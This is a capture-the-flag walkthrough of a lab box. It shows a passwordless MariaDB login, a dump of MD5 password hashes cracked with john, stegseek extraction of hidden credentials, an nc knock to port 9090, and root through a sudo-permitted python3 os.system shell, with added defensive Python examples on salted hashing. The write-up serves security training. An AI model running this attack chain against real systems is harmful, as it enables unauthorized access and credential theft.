Nmap #
[root@kali] /home/kali/hexthink-silent-shadow
❯ nmap 192.168.55.67 -sV -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4d:6e:39:a4:15:86:88:70:c7:9d:09:91:a3:0b:18:8c (ECDSA)
|_ 256 f9:21:5d:25:ee:76:05:db:01:3b:45:c9:68:b0:82:9f (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.58 (Ubuntu)
3306/tcp open mysql MariaDB 5.5.5-10.11.11
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.11.11-MariaDB-0ubuntu0.24.04.2
| Thread ID: 34
| Capabilities flags: 63486
| Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, SupportsCompression, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, FoundRows, ODBCClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: wPg7y~-c,O)~bPI]yfu:
|_ Auth Plugin Name: mysql_native_password
9090/tcp open zeus-admin?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, SqueezeCenter_CLI, TLSSessionReq, TerminalServerCookie, WMSRequest, X11Probe, drda, ibm-db2-das, informix:
|_ Protocolo incorrecto. Esto no es HTTP.
Mysql #
On the index.php served on port 80, the page reveals that a user ctf_user exists and can log in to the database with a password. Let's try logging in with an empty password.
[root@kali] /home/kali/hexthink-silent-shadow
❯ mysql -h 192.168.55.67 -u ctf_user -p ⏎
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
[root@kali] /home/kali/hexthink-silent-shadow
❯ mysql -h 192.168.55.67 -u ctf_user -p --ssl=False ⏎
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 9589
Server version: 10.11.11-MariaDB-0ubuntu0.24.04.2 Ubuntu 24.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
Retrieve the user information:
MariaDB [ctf_db]> select * from usuarios;
+---------+----------------------------------+
| login | password |
+---------+----------------------------------+
| admin | 21232f297a57a5a743894a0e4a801fc3 |
| admin | 21232f297a57a5a743894a0e4a801fc3 |
| test | 098f6bcd4621d373cade4e832627b4f6 |
| support | e99a18c428cb38d5f260853678922e03 |
| h4cker | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+----------------------------------+
5 rows in set (0.001 sec)
Crack the hashes with john:
[root@kali] /home/kali/hexthink-silent-shadow
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 4 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
password (h4cker)
abc123 (support)
admin (admin)
test (test)
4g 0:00:00:00 DONE (2025-05-31 05:13) 400.0g/s 16627Kp/s 16627Kc/s 18662KC/s tina00..tauruz
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
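The hashes in the usuarios table fall in under a second because they are plain, unsalted MD5: one digest per candidate word can be compared against every row at once. The following added Python example (not part of the original writeup) reproduces that check against the four hashes dumped above with a constructed six-word wordlist standing in for rockyou.txt, flags hashes that look like unsalted MD5, and shows the storage format a defender should use instead (PBKDF2-HMAC-SHA256 with a per-user random salt). The wordlist, iteration count and function names are assumptions.

```python
import hashlib
import hmac
import os
import re

# Hashes exactly as dumped from the usuarios table (login -> unsalted MD5 hex).
DUMPED_HASHES = {
    "admin": "21232f297a57a5a743894a0e4a801fc3",
    "test": "098f6bcd4621d373cade4e832627b4f6",
    "support": "e99a18c428cb38d5f260853678922e03",
    "h4cker": "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed mini wordlist standing in for rockyou.txt (assumption).
WORDLIST = ["123456", "password", "admin", "letmein", "test", "abc123"]

_MD5_HEX = re.compile(r"^[0-9a-f]{32}$")


def looks_like_unsalted_md5(value: str) -> bool:
    """Heuristic a defender can run over a credentials table: a bare 32-char
    lowercase hex string with no algorithm prefix or salt is almost always MD5."""
    return bool(_MD5_HEX.match(value))


def crack_unsalted_md5(hashes: dict, wordlist: list) -> dict:
    """Return {login: password} for every hash matching a wordlist entry.

    One md5() call per candidate word serves every user, because there is no
    salt to make the digests user-specific. This is the property john exploits
    when it reports millions of candidates per second for Raw-MD5.
    """
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {login: lookup[h] for login, h in hashes.items() if h in lookup}


def hash_password(password: str, salt: bytes = None, iterations: int = 200_000):
    """PBKDF2-HMAC-SHA256 with a 16-byte random salt. Returns (salt_hex, digest_hex).

    The salt defeats the shared lookup table above: the same password gives a
    different digest per user, and the iteration count makes each guess costly.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex(), digest.hex()


def verify_password(password: str, salt_hex: str, digest_hex: str,
                    iterations: int = 200_000) -> bool:
    """Constant-time comparison of a candidate against a stored (salt, digest)."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), iterations)
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    weak = [login for login, h in DUMPED_HASHES.items() if looks_like_unsalted_md5(h)]
    print("rows that look like unsalted MD5:", weak)
    print("recovered:", crack_unsalted_md5(DUMPED_HASHES, WORDLIST))
    salt, digest = hash_password("admin")
    print("salted storage for 'admin':", salt, digest)
    print("verify:", verify_password("admin", salt, digest))
```

The recovered map matches john's output above; the same four words hashed with `hash_password` produce a different digest on every call, so a dump of that table would give an attacker nothing to look up.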
Stegseek #
But the cracked passwords turned out to be of no use. I find it more convenient to browse with a database client; one of the tables contains an image, which can be exported directly from the database client or with the command line below.
[root@kali] /home/kali/hexthink-silent-shadow
❯ mysql -h 192.168.55.67 -u ctf_user -p --ssl=False --batch --raw -e "SELECT imagen FROM ctf_db.noticias WHERE id=2" > imagen.jpg
Enter password:
[root@kali] /home/kali/hexthink-silent-shadow
❯ stegseek imagen.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[!] error: the file format of the file "imagen.jpg" is not supported.
[root@kali] /home/kali/hexthink-silent-shadow
❯ file imagen.jpg ⏎
imagen.jpg: data
[root@kali] /home/kali/hexthink-silent-shadow
❯ tail -n +2 imagen.jpg > output.jpg && mv output.jpg imagen.jpg
[root@kali] /home/kali/hexthink-silent-shadow
❯ file imagen.jpg
imagen.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 0x0, segment length 16, baseline, precision 8, 800x600, components 1
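`file` reported "data" the first time because `mysql --batch` prints the column name (`imagen`) as a first line before the value, so the export did not begin with the JPEG SOI marker (FF D8 FF); `tail -n +2` drops that one line. The following added Python example (not from the original writeup) does the same repair by locating the SOI marker instead of assuming the header is exactly one line, and refuses to write output when no marker is present. The constructed export bytes and function names are assumptions.

```python
import sys

# Every JPEG/JFIF file begins with the SOI marker FF D8 FF.
JPEG_SOI = b"\xff\xd8\xff"

# Constructed stand-in for the exported file: the column-header line that
# `mysql --batch` prints, followed by a minimal JFIF header and an EOI marker.
CONSTRUCTED_EXPORT = (
    b"imagen\n"
    + b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00"
    + b"\xff\xd9"
)


def header_line(data: bytes) -> bytes:
    """Bytes preceding the first SOI marker, i.e. the --batch column header."""
    idx = data.find(JPEG_SOI)
    return data[:idx] if idx > 0 else b""


def strip_to_jpeg(data: bytes) -> bytes:
    """Return `data` from the first SOI marker onwards.

    Marker-based rather than line-based: it also copes with a multi-line
    header or other leading bytes, where `tail -n +2` would leave a broken
    file, and it raises instead of silently producing garbage when the
    export is not a JPEG at all.
    """
    idx = data.find(JPEG_SOI)
    if idx < 0:
        raise ValueError("no JPEG SOI marker found in export")
    return data[idx:]


def repair_export(path_in: str, path_out: str) -> int:
    """Rewrite path_in to path_out starting at the JPEG; return bytes removed."""
    with open(path_in, "rb") as f:
        raw = f.read()
    fixed = strip_to_jpeg(raw)
    with open(path_out, "wb") as f:
        f.write(fixed)
    return len(raw) - len(fixed)


if __name__ == "__main__":
    # Usage: python3 repair_export.py imagen.jpg imagen_fixed.jpg
    removed = repair_export(sys.argv[1], sys.argv[2])
    print(f"removed {removed} leading byte(s)")
```

Two client-side details matter here: `--raw` is required because batch mode otherwise escapes newlines, tabs and backslashes in the output, which corrupts a binary blob, and `--skip-column-names` (`-N`) suppresses the header line so the post-processing is not needed at all.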
[root@kali] /home/kali/hexthink-silent-shadow
❯ stegseek imagen.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "hello"
[i] Original filename: "instrucciones.txt".
[i] Extracting to "imagen.jpg.out".
[root@kali] /home/kali/hexthink-silent-shadow
❯ cat imagen.jpg.out
Para continuar deberás abrir el Puerto 9090
Esto no es un escaneo Es un saludo
Envía la siguiente cadena al puerto 9090:
LOGIN whisper
KEY whisper9090
No lo hagas mal Solo hay una oportunidad
The extracted file is a message: the specified text has to be sent to port 9090.
[root@kali] /home/kali/hexthink-silent-shadow
❯ echo -e "LOGIN whisper\nKEY whisper9090" | nc 192.168.55.67 9090
Usuario SSH: whisper
Contraseña: 7h3m1nDf0x
This yields the SSH login credentials.
Root #
Check the sudo rules:
whisper@server:~$ sudo -l
Matching Defaults entries for whisper on server:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User whisper may run the following commands on server:
(ALL) NOPASSWD: /usr/bin/python3
Privileges can be escalated directly through the os module:
whisper@server:~$ sudo /usr/bin/python3 -c 'import os;os.system("bash")'
root@server:/home/whisper# id
uid=0(root) gid=0(root) groups=0(root)
Summary #
User: the page output reveals the database user ctf_user, which can log in to the database without a password; export the image and decode it with stegseek to obtain the login credentials.
Root: privilege escalation through python, very simple.